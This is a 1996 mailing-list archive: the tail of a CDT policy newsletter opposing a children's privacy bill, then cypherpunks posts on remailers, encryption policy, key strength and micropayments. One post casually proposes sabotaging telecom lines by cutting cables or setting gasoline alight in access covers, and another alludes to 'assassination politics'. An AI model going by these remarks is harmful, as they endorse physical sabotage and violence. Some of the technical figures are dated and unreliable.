children unprecedented and important new educational and recreational
opportunities, the medium also may offer access to inappropriate material,
or exposure to unfair marketing or information collection practices.
 Solutions to these problems must be carefully analyzed and should take into
account both the unique nature of the Internet, as well as the multitude of
First Amendment and privacy rights at stake for all who seek to read,
communicate, and associate with others in the online environment. In fact,
the Federal Trade Commission (FTC), whose responsibility it is to police the
existence and proliferation of unfair or deceptive advertising and
information practices has scheduled hearings for June 4 and 5 to look at
these very issues as they apply to the Internet.

Because your bill was drafted to apply to all media we are concerned
that its application in the Internet context may lead to unintended
consequences. We ask that you examine, together with the FTC, the unique
qualities of the Internet and the problems that result from regulating
activity at the information publisher or Web site operator end.

In its application to the Internet, the Children's Privacy Protection
and Parental Empowerment Act is both over-inclusive, covering virtually all
who participate in the Internet, and ineffective, in that it leaves
substantial loopholes for those who engage in the behavior at which the bill
is targeted.

The term "personal information," the basic regulatory target of the
bill, is defined in such as way that it may include nothing more than an
electronic mail address which by its nature, gives no indication of the age
or physical location of a user.  Furthermore, the term "list broker," is
drafted to cover any entity which exchanges personal information in the
course of its operation. The vast majority of World Wide Web site operators,
as well as anyone who operates a listserv, mailing list or other information
distribution mechanism, all collect, store, and may well exchange, email
addresses. Then, unless Web site operators obtain parental consent before
collecting information, they risk criminal penalties for violation of
section (a)(4).

The difficulty in compliance is two-fold. First, information providers
on the Internet have no way of distinguishing children from adults.  In
fact, compliance with the bill could well lead to an increase in the
collection of information about children and adults, only compounding
privacy risks. Even with the imposition of an unacceptably intrusive
national ID system (a system that none of us support), it would still be
essentially impossible for an information publisher or Web site operator to
establish the age of the user visiting the providers site. Second, the
requirement to disclose the source of personal information about children to
parents creates unclear new obligations on Internet information providers.
In fact, many of the information providers who would be covered by your
bill do not keep track of the source of their information and thus may not
have the ability to comply with the statute.  Compliance with this section
could well lead to an increase in the overall collection of personal
information about Internet users, thereby compounding privacy risks.

Imposed identification procedures applied to the World Wide Web under
the threat of criminal penalties would limit all Internet users' ability to
read, speak, receive information and interact online under
constitutionally-protected conditions of anonymity. Further, requiring
parental consent in all instances or requiring providers to disclose
information to parents collected from children fails to acknowledge the
distinction between young children and teenagers and their rights under the
Constitution.

Finally, section (a)(6) which criminalizes any distribution or receipt
of personal information where the receiver has knowledge or "reason to
believe that the information will be used to abuse the child or physically
harm the child" is well-intentioned, but potentially so broad as to cover
anyone who receives and discloses personal information about a child. The
bill establishes no clear standard of care or level of knowledge necessary
to meet this requirement, leaving everyone on the Internet in doubt about
whether or not they may be violating this new crime. Schools and
organizations who publish directories as well as newspapers who publish the
identity of a child in a news story could be subject to prosecution because
they had "reason to know" that the information may end up in the possession
of bad actors.

Given all of these difficulties in applying your bill to the Internet,
and given the importance of addressing children's privacy issues, we suggest
that examination of alternatives is in order. Empowering parents to protect
their children's privacy with existing technological tools and fair
information practices by the industry will help ensure that the Internet
continues to grow and thrive for both commercial and noncommercial
endeavors. For example, software already on the market such as Cyberpatrol,
as well as industry-standard technologies such as the Platform for Internet
Content Selection (PICS) enable people -- including parents and their
children -- to restrict access to sites which practice objectionable
marketing and information collection techniques.

At present, PICS technology, along with other innovative products,
allows parents to filter and block-out materials that contain objectionable
content or block access to sites with inappropriate or abusive marketing
practices. Current technology can enable parents to:

* prevent their children from accessing Web sites with inappropriate
  information practices -- as defined by the parent or a consumer or privacy
  organization of the parent's choice;

* prevent their children from revealing personal information such as name,
  address, and e-mail address to others;

* install security measures such as passwords that prevent their child from
  changing rules about Web site access or information disclosure, collection
  and use that the parent has established.

The Internet community is already considering extensions to the PICS
specifications which will enable individual users and parents to block the
transmission of their personal information to Web sites they visit and to
express a preference about how and to what extent they are willing to have
personal information reused. PICS, Cyberpatrol and other technologies can
help eradicate the deceptive and inappropriate practices your bill seeks to
address without compromising the rights of users or content providers.

Several of us have had the opportunity to talk with you and your staff
about this legislation. We appreciate your willingness to discuss these
issues and look forward to working with you in this important area in the
hopes that technological alternatives combined with better industry
practices and much more narrowly crafted legislation will help protect this
nation's children in the online world, consistent with First Amendment and
privacy principles.

Sincerely,

The Center for Democracy and Technology
The Electronic Frontier Foundation
People For the American Way Action Fund
Voters Telecommunications Watch
----------
----------------------------------------------------------------------------
(3) Join Senator Conrad Burns Live Online to Discuss Encryption Policy The
    Night Before His Subcommittee Holds a Hearing On the Issue!

 --> Visit http://www.hotwired.com/wiredside/ for details <--

In what is becoming the newest way for Congress to read the net.community's
opinion on issues, Senator Conrad Burns (R-MT) will be on HotWired on June
11th @ 10pm EST to discuss the encryption issue with all attendees. The
next day, Senator Burns will chair the first of two scheduled hearings on
the encryption issue with industry luminaries.

Never before has the public had this much access to legislators without
geographical proximity.  Cheaper than teleconferencing, and more direct
and unfiltered than the traditional press, online chats allow the public
to directly question and hear the answers of Congress.

Have a question about encryption policy that you've never been able to find
out from the government?  Come to the HotWired chat and ask Senator Burns
to be your advocate to press the witnesses and the White House on these
issues.

The online chat is at 10pm EDT (7pm PDT) on Tuesday June 11, the night
before the first hearing. HotWired's WiredSide chat is at:

     http://www.hotwired.com/wiredside/

Next Tuesday's forum is another in a series of planned events, and is part
of a broader project coordinated by CDT and the Voters Telecommunications
Watch (VTW) designed to bring the Internet Community into the debate and
encourage members of Congress to work with the Net.community on vital
Internet policy issues.

The transcript from last week's discussion with Congressman Rick White is
now available -- for information about the transcript, previous events with
other members of Congress, and upcoming events, please check CDT's newest
Issues Page, "Congress and the Net":

     http://www.cdt.org/net_congress/

------------------------------------------------------------------------
(4) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(5) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.23                                             6/7/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 8 Jun 1996 16:17:00 +0800
To: cypherpunks@toad.com
Subject: Is the alpha.c2.org 'Nymserver Down?
Message-ID: <199606080439.VAA09011@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


My 'nym seems to be broken again, and I've heard other reports that
the alpha.c2.org 'nymserver is down.  Yet, Raph's ping list seem to
indicate it's healthy:

remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
alpha    alias@alpha.c2.org               +-++**++-++*    49:22  99.66%


What's the story?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 8 Jun 1996 16:30:22 +0800
To: caal@hopf.dnai.com
Subject: Re: Internet solution for law enforcement
In-Reply-To: <199606071900.MAA12968@hopf.dnai.com>
Message-ID: <Pine.GUL.3.93.960607215457.1728A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 7 Jun 1996 caal@hopf.dnai.com wrote:

> Has anyone seen this yet?  Looks like it's two weeks old.  Internet Police!
> 
> >[BizWire]    5/20/96
> >
> >        (SUN/PSI-INTL)(SUNW) PSI International, Sun partner, unveils Java-
> >        based Internet solution for law enforcement agencies; "Internet in
> >        Blue" Police Internet/Intranet Application Suite Available in July
> >        1996 

Is this a joke, or has the world gone completely batty?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 8 Jun 1996 16:41:12 +0800
To: "P.J. Ponder" <cypherpunks@toad.com
Subject: Re: Wasting time and bandwidth on Bell
Message-ID: <199606080514.WAA02576@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 PM 6/7/96 +0100, P.J. Ponder wrote:

>Or they automatically delete any posts that come from or relate to the 
>puerile bullshit Bell is infamous for, and choose not to get dragged into 
>this type of time- and bandwidth- wasting garbage.  Of which this post is 
>just another, of course, but i get so damn sick and tired of the constant 
>imposition of 'AP' and related nonsense on this list. 

It is to be expected that among the citizens of this world, there would be 
those who have so much moral or economic stock in the current order that 
they would strongly resist any serious change. (maybe they're already on 
top, or they hope to be in a few years, etc.)   Until a few years ago, 
almost everybody probably figured that the main effect of computer 
networking (and the Internet) on politics would be to allow people to send 
letters to their Congressmen faster while destroying fewer trees, or letting people 
send in their votes by email rather than travelling to a voting booth.

Simple changes.  Non-threatening.  Don't rock the boat.  Don't upset the 
apple cart.  Don't make a wave.

It will be a great shock to most of you to hear that the real changes will 
not only be figuratively "revolutionary" but also LITERALLY revolutionary.  



>>3. Congress would have no problems passing a law outlawing AP, if one
>>does not exist already.

>I would be satisfied if they just outlawed e-mail about it. 

I guess this guy never heard about the 1st Amendment.  Or maybe he did, but 
he concluded that it must have been a mistake, because it's not the kind of 
thing that the people in charge today would vote for if they had a choice in 
the matter..

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 8 Jun 1996 16:37:13 +0800
To: ponder@wane-leon-mail.scri.fsu.edu>
Subject: Re: Wasting time and bandwidth on Bell
In-Reply-To: <Pine.3.89.9606071348.A12943-0100000@wane3.scri.fsu.edu>
Message-ID: <4liCDhS00YUzEPhpdP@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 7-Jun-96 Wasting time and bandwidth
.. by "P.J. Ponder"@wane-leon- 
> Or they automatically delete any posts that come from or relate to the 
> puerile bullshit Bell is infamous for, and choose not to get dragged into 
> this type of time- and bandwidth- wasting garbage.  Of which this post is 

One of 'em just emailed me saying just that.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sat, 8 Jun 1996 14:23:28 +0800
To: stewarts@ix.netcom.com>
Subject: Re: OECD http://www.oecd.org/news_and_events/release/nw96-46a.htm
In-Reply-To: <199606071824.LAA06312@toad.com>
Message-ID: <EliCI2_00YUzQPhrRx@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 7-Jun-96 Re: OECD  
http://www.oecd... by Bill Stewart@ix.netcom.c 
> >>The private sector is closely involved in drafting the Guidelines,
> >>with business representatives from the Business and Industry Advisory
> >>Committee (BIAC) participating at the meeting. 
> >>The OECD meeting, which took place on 8 May, was hosted by the US
> >>Department of State in Washington DC.
>  
> Was the meeting announced to at least the public in advance?
> The schedule on the web page mentioned the 8 May meeting,
> at least after the fact, but does not list any of the following
> meetings, and there's no identification of your BIAC committee's
> members or even the member governments participating.

I believe the OECD meetings are closed to the public and journalists. I
was thinking of going to one, but was told that I couldn't. (Even though
I'm fully accredited with U.S. Congress-issued press identification.)

Isn't there an OECD meeting soon in Paris? Marc Rotenberg from EPIC has
been following this closely and would be a good person to ask.

-Declan
(somewhat tipsy, always a bad idea when posting to cypherpunks)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sat, 8 Jun 1996 15:49:13 +0800
To: cypherpunks@toad.com
Subject: eTimeouts
Message-ID: <Pine.SUN.3.91.960607223623.19492A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


Are about to be imposed on Perry and Phil. You don't both have to play
with the same tentacle - there are plenty to go around. Now behave, or I
won't let you watch todays episode of (smith) Barney. 

Simon
---
Cause maybe  (maybe)		      | In my mind I'm going to Carolina
you're gonna be the one that saves me | - back in Chapel Hill May 16th.
And after all			      | Email address remains unchanged
You're my firewall -    	      | ........First in Usenet.........




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ScottMorris <smorri59@raptor.icubed.net>
Date: Sat, 8 Jun 1996 15:27:55 +0800
To: cypherpunks@toad.com
Subject: Re: Class III InfoWar: TST Article
Message-ID: <9606080332.AA29486@raptor.icubed.net>
MIME-Version: 1.0
Content-Type: text/plain


[snip]
>
>On the substance of Schwartau's claims about "HERF guns," I'm a bit
>skeptical that this is a real threat _at this time_. I'll say more on this
>later.
>

>So, why am I so skeptical? For a couple of reasons:
>
>1. Conventional explosives work perfectly fine for a lot of sabotage
>efforts. It is unlikely that a mysterrious van is likely to be parked next
>to a London brokerage or computer firm in the City of London, given their
>history of terrorism.

Why bother with explosives when you can pull a manhole cover and climb down
with a <insert power tool of choice here, I prefer the chainsaw myself>. All
that copper/fiber has to run somewhere in the area to get into the buildings.
When the conductor is gone say goodnight. Or the alternative, pour gas into
the access covers and light it. Simple is better.

>2. To be a credible threat, there usually needs to be some form of
>"demonstration." I have heard of no such thing. Absent such a public
>demonstration, I find it hard to believe that beancounters would OK the
>giving away of hundreds of millions of dollars for a threat which is
>abstract and hard to understand for laymen.

        Short of a tac nuke there won't be one any time soon. The
herf/emp/sci-fi weapon of choice is not feasible *at this time*. Remember
the square law. If it isn't in the machine room, or damn close it won't
work. One has to wonder why the assorted experts on this haven't built a
working model and given a controlled demonstration.

>3. This recent story smacks of hype. I'm not saying Schwartau is hyping his
>conferences and his book, and his consulting business, just saying it
>strikes me as a hyped threat without direct confirmation.

While the consultants are hypeing all this I have REAL threats to deal with.

>
>--Tim May
>

P.S. I guess I'm going to have to get Eudora Pro so I can filter out the
psychos 'R' us persona.
-----
My opinions are my own, not those of my employer.

Scott L. Morris	
smorri59@mailhost.icubed.net
** They can have my PGP key when they **
** pry it from my cold dead keyboard! **





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Sat, 8 Jun 1996 19:27:47 +0800
To: Scott Brickner <nelson@crynwr.com
Subject: Re: Multiple Remailers at a site?
Message-ID: <added28f0302100472cc@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:16 PM 6/6/96, Scott Brickner wrote:
<SNIP>
>The discussion was about multiple remailers from multiple accounts on
>the same machine.  The very existence of the remailer, independent of
>issues like shuffling and chaining, is supposed to eliminate
>identifying the originator by the content of the message.  Message
>shuffling, delays, and chaining are entirely for the purpose of
>reducing the information available to the traffic analyst.  If several
>remailers are running on the same machine, they may be treated as if
>there were only one remailer, for the purpose of traffic analysis.
>Getting more traffic going through them just makes the analysts job
>easier, because his statistical conclusions are stronger.
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

I don't think I am following you. My messages are a constant size signal (I
send N messages through the remailer). More traffic increases the
background signal and background noise. While the signal to noise of the
background gets better, the actual amount of noise went up so the ratio of
MY signal to the background noise went down. Perhaps I don't understand
what you are saying.

I think multiple remailers on a machine are less effective than a single
remailer with the combined traffic of all the individual remailers, because
the combined remailer does better reordering from a larger pool.

If the remailer chain contains just two or more uncompromised hops (not
necessarily consecutive) I suspect an attacker will be forced to treat the
remailer bramble as a single object. This attack is based on time
correlations of messages sent and received. In this case background traffic
is good because of the large number of false correlations it generates.
However, it is stunning how few messages it takes to make the correlation
stand out. The defense against this attack is to ensure that you send and
receive enough remailer mail to correlate with all other users for all
messages. Producing cover traffic, some of which returns to you, and some
of which is bit bucketed also ensures that it will not be known when you
receive a real message (as opposed to one of your own). Obviously this is
best done when you are a remailer operator yourself.

        -Lance (who will now dismount the soap box)

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Einar Stefferud <Stef=buyinfo@nma.com>
Date: Sat, 8 Jun 1996 23:58:03 +0800
To: cypherpunks@toad.com
Subject: Re: Micropayments: myth?
In-Reply-To: <199606072058.NAA05291@netcom3.netcom.com>
Message-ID: <27817.834218804@odin.nma.com>
MIME-Version: 1.0
Content-Type: text/plain


Yo are assuming away facts that some of us cannot assume away.

>From your message Fri, 07 Jun 96 13:58:53 -0700:
}
}>
}>> the wallet action will always
}>> be tied with some other action. the user picks up the phone to dial
}>> somewhere, and it says, "that will be .3c-- will you pay"? he says
}>> yes. 
}>
}> How will you know the cost is .3c a priori?
}>What's to stop me from saying yes to the .3c and staying on the line
}>forever?
}
}I don't understand why this micropayment thing is being thought
}so complicated.
}
}I am making some simple assumptions that seem to not be obviously
}apparent, apparently.
}

Specifically, you assume that no one will want to audit and check up
on micro-charges that accumulate nto bills.  Like my phone bill with 5
pages of 2-5 cent toll calls.  I really don't want to analyze all
that, but I also don't trust the phone company to always present me
with an accurate bill. 

So, I would rather deal with the accumulation schem by paying a fixed
fee for a service that does not send me all that deatil that I cannot
use or analyze.  To use it I would have to keep a log, with the times
of all calls to compare.

Now, you want to move this kind of charging to some service I do not
trust as much as I trust the phone company, and send me a bill for an
accumulation of charges without supporting detail.  Thsi might be OK
for small amounts, but what about a large company where these
undocumented microcharges add up to say, $200,000/year?

How do we know that someone is not simply padding the bill?  All we
need is for the billing system to slip in an occasional bogus charge
the looks for all the world like any other microcharge.

You know, like the bank employee case where someone accumulates the
round-up transaction adjustments to an account and ships the money to
Switzerland.

This is what you are omitting in your assumptions...
I just don't believe the world is going to be so trusting....\Stef




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Be Good)
Date: Sat, 8 Jun 1996 18:14:09 +0800
To: foodie@netcom.com
Subject: Re: Thank you for the Archives 100 messages
In-Reply-To: <31B91EA0.16F@netcom.com>
Message-ID: <199606080730.AAA24004@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> qut4.qut@netcom.com wrote:
> > 
> > Apologies, but rich has deleted me from
> > his mailboxes, and for a few days now,
> 
> As I have, too, now.
> 
> > somebody has placed a global cancel bot on
> > me.  I'm gonna have plenty of fun figuring
> > this out.  Kwow any good sniffers?
> 
> I'm glad! If my processor/filtering software doesn't
> have to deal with your garbage, that's more time I have
> to spend with folks who have something to say.

The only thing your type of "cypherpunk" has
to say, is blather about liability, copyrights,
and other capitali$t bs.

REAL crypto-anarchists, of course, want the 
destruction of copyrights, trademarks, and
other weapons of capitali$m, and will
implement crypto-anonymonity to proceed
forthwith.

> No, I don't know of any better "sniffers" (I assume you
> mean, "software that can detect a cancelbot"), as such
> software is impossible to detect. Of course, unless Rich
> (or whomever cares so much about a moron) has either root
> on toad.com, or at least as many resources as the NSA, he
> can't cancel your mail to Cypherpunks (or anywhere else).

I was talking about netnews, mormon.

> > I agree the list should be public usenet:
> > A mail gate-way to a usenet group that
> > ALSO permits unmoderated posts.  This
> > would be a nice way to combine a strict
> > moderated mail-list, with a standard
> > netnews group.
> 
> Er, what?
> 
> That paragraph makes absolutely no sense whatsoever.

There's already hundreds of groups like
that, stupid.  It will be implemented,
whether you like it or not.


--

Kill Your Television




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 8 Jun 1996 19:00:20 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: How to explain crypto?
Message-ID: <199606080749.AAA26078@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:50 PM 6/4/96 -0500, Declan wrote:
>For example, someone sent me this explanation:
>  "The 1024 bit key is likely an RSA key, and is not comperable to a 40 bit
>  symetric key.  From memory, 1024 bit RSA is about as hard to crack as 90
>  bit symetric."
>Is this a reasonable comparison?

It's probably close enough for anti-government work; the relative strength
depends a lot on whether you're using general-purpose computers or
custom crackerboxes, and on the state of the art in factoring technologies.
I'd be tempted to be verbose and say that public-key systems like RSA
use prime numbers for keys, so they need to be a lot longer than
secret-key algorithms like DES or RC4 which can use any number as a key but
need to keep it secret.  You can double the cracking effort by adding
one bit to a secret key or about 10 to a public key. 
500-bit public keys and 56-bit secret keys are about the limit of cracking 
technology for organizations with a couple of million dollars spare for
supercomputers, which is your desktop in 5-10 years.

The NSA's Clipper Chip used 80-bit keys, which is about 20 years' protection
against people who can't use the built-in wiretap or bribe a cop to
get a warrant.  One problem with these secret hardware designs is that you 
usually can't tell if there's a back-door unless they tell you - or goof up
like they did with the Clipper's short checksum.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 8 Jun 1996 19:13:45 +0800
To: perry@piermont.com
Subject: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
Message-ID: <199606080829.BAA26495@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:52 AM 6/7/96 -0400, Perry wrote:
>hallam@Etna.ai.mit.edu writes: [...]
>> Well, Milton Friedman's method for saving the whale is to leave it
>> to the free market, if people want whales in the oceans they won't
>> buy whale meat.
[...]
>Dr. Phill Hallam-Baker, PhD, however, does not understand economics in
>spite of his PhD and thus attributes views to free market economists
>that they do not hold, as in his whole cloth synthesis of a viewpoint
>which he ascribed to Milton Friedman which Milton Friedman would never
>in a million years espouse.

Oh, come on now, Perry - while Friedman has more sense than that,
you've been around the Libertarian party long enough to know people
who call themselves free-market environmentalists who contend that whales
will be best protected if they're owned property, that do-gooder
environmentalists will be free to outbid Sushi Inc.* for them,
and that initial ownership of the whales ought to be decided by
the traditional initial land-ownership method of homesteading.
Personally, I view this as rent-seeking by folks who ought to let
the whales own themselves, and think they've got as little understanding
of free-market environmentalism as the government bureaucrats who
massively subsidize the logging of US National Forests, but they _are_ there.

[*A wholly owned subsidiary of Taco Bell, but with digicash** and 
anonymous stock ownership, On the Internet, nobody knows that all
restaurants are Taco Bell.]

[**Ineffective attempt to pretend some relevance to cypherpunks...]


#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 8 Jun 1996 12:09:39 +0800
To: cypherpunks@toad.com
Subject: Re: Electronic Signatures
In-Reply-To: <19960607141610.13186.qmail@ns.crynwr.com>
Message-ID: <Pine.HPP.3.91.960608020153.21836A@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On 7 Jun 1996 nelson@crynwr.com wrote:

> No, I was responding to the person who was distrustful of the law's
> requirement for certified signatures.  DON'T WAIT FOR THE GUVMINT TO
> CREATE A CERTIFYING AGENCY -- start your own and get some momentum.
> Makes it much harder for them to claim that PGP won't work because

Good advice. And if we are all waiting for our respective Post Offices
to come aboard we'll have to wait for a long time. I don't remember
how many years ago our Post Office was announcing 'real soon now' for
the first time, because so much time has elapsed since then. I guess
such institutions (bye economic capabilities) are mainly hiring cheap
incompetents who will never catch up with the latest developments.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 8 Jun 1996 13:01:10 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
In-Reply-To: <199606071452.KAA18055@jekyll.piermont.com>
Message-ID: <Pine.HPP.3.91.960608021535.21836B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 7 Jun 1996, Perry E. Metzger wrote:

> Of course, what Dr. Phill Hallam-Baker, PhD, suggests is idiotic. As
> any free market economist would tell you, the way to stop a resource
> from being destroyed is not to pray that people won't buy it but to
> assure that someone has an ownership stake in the resource, thus
> assuring that their investment would be destroyed if the resource
> vanished.

Who is going to assure that someone has an ownership stake in the
Humpback Whales? The World Government? Is that entity supposed to
give the whales to some private whale-watcher's tourism enterprise?
I don't get it.

Who cares about a bunch of Norwegian (or Japaneese) fishermen?

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 8 Jun 1996 14:53:33 +0800
To: cypherpunks@toad.com
Subject: NTT Chips Beat Cops
Message-ID: <199606080230.CAA26365@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Economist, June 8, 1996, p. 65. 
 
 
   Encryption 
 
   Silence of the bugs 
 
 
   Spare a thought for America's professional snoops. For 
   decades the FBI and others have counted the telephone 
   wiretap among their favourite weapons against crime, as 
   countless mafiosi can (and did) testify. Now, software in 
   a computer or digital telephone can scramble a message so 
   effectively that no law-enforcement agency can read it. For 
   years, the government has fought back by restricting the 
   use of encryption, to the fury of privacy advocates on the 
   Internet, where rampant eavesdropping makes encryption 
   essential. Now a bit of silicon and a stack of paper have 
   apparently ended the battle: the cops lost. 
 
   The bit of silicon is actually two chips that can encrypt 
   data transmissions so that they are in effect uncrackable. 
   Had the chips been developed in the United States, the 
   government would have classified them as "munitions" and 
   banned their export. But they were developed in Japan, by 
   NTT, the telephone giant, and the Japanese subsidiary of 
   RSA, an American encryption company, which revealed their 
   existence early this week. They can therefore be used 
   around the world, and even imported into the United States. 
   There seems nothing the American government can do about 
   it. 
 
   As if that were not bad enough, America's restrictive 
   encryption policy took another hit last week when a report, 
   commissioned by Congress and compiled by the prestigious 
   National Research Council (NRC), concluded that the policy 
   had hurt Americans far more than it had helped them. For 
   the past few years, the White House has been offering a 
   purported compromise: give the government (or a mutually 
   trusted third party) a key to read your encrypted e-mail, 
   and you can scramble it all you like. The problem with this 
   so-called "key escrow" proposal was that it smacked to many 
   of Big Brotherism. The computer industry rejected it out of 
   hand, and fell back instead on weaker encryption that was 
   not regulated, even though this can be cracked over a 
   weekend with a home PC. 
 
   Up to now, the government's response to cries for better 
   encryption for all has been to fall back on its 
   responsibility to protect the citizenry. The NRC panel 
   rejected this, together with the "if only you knew what we 
   know" argument the government has usually trotted out. 
   Composed of former security officials and encryption 
   experts, this panel did know what the government knows, and 
   was still not convinced. 
 
   Now the NTT chips seem to sweep away the whole debate. NTT 
   has already sold the chips in 15 countries, and they should 
   soon be incorporated in products. Stewart Baker, the former 
   general counsel of America's National Security Agency, 
   concedes that the chips have probably killed encryption 
   controls in America, but argues that the battle will 
   continue to run in Europe, where countries such as France 
   limit their use. For the rest of the world, these bits of 
   silicon may indeed make it harder for police to protect 
   citizens. But they will also make it easier for citizens to 
   protect themselves. 
 
   -- 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@sos.sll.se>
Date: Sat, 8 Jun 1996 14:38:16 +0800
To: cypherpunks@toad.com
Subject: Re: It tolls for thee
In-Reply-To: <addda7cd01021004f950@[205.199.118.202]>
Message-ID: <Pine.HPP.3.91.960608022659.21836C-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 7 Jun 1996, Timothy C. May wrote:

> Importantly, I'm including my own words, explicitly. Sorry to burst _our_
> bubbles, but I just don't think the lawmakers and burrowcrats are being
> driven by loose talk by us.

Perhaps not the lawmakers, but...

There was this moment last summer, on a Friday, when loose
talk on the cp-list (and, explicitly, some comments from TC May)
made me 99% sure that selling Netscape stock (short) would be a
great idea. Still next Monday it sold for something like $145.
Next Wednesday it fell to around $120. I know for sure that if
I had been in a position then to conveniently (and immediately)
act on the NY Stock Exchange (which I was not) I would have
risked something like $5,000 on such a deal - I'm not rich but
so strong was the cypherpunkish momentum towards this development.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Sat, 8 Jun 1996 15:33:09 +0800
To: cypherpunks@toad.com
Subject: mailing-list through a remailer
In-Reply-To: <FBBE9A4A02502C79@-SMF->
Message-ID: <19960608040239.16261.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Scott Binkley writes:
 > Having a mailing-list run through a remailer??

Only through a penet-type remailer.  It couldn't work at all with a
mixmaster-type, and would work but poorly with a ghio-type with reply
block.

 > It would be double blind, and difficult to find out who ran the list.

Only if your name isn't Julf.

 > If you chained the remailers, it would be even more difficult.

If you chained the remailers for your subscription, then every message
would travel the same path.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | It's no mistake to err on
Potsdam, NY 13676 | +1 315 268 9201 FAX   | the side of freedom.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Sat, 8 Jun 1996 15:26:39 +0800
To: jpunix.com.cypherpunks@toad.com.alt.privacy.anon-server@myriad.alias.net
Subject: middle-man may be moving...
Message-ID: <199606080215.EAA10166@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


	It looks like I'm going to have to move the middle-man remailer.
The nym server at alpha.c2.org has been down for several days. This
directly affects the middle-man remailer. Since nymrod@nym.jpunix.com has
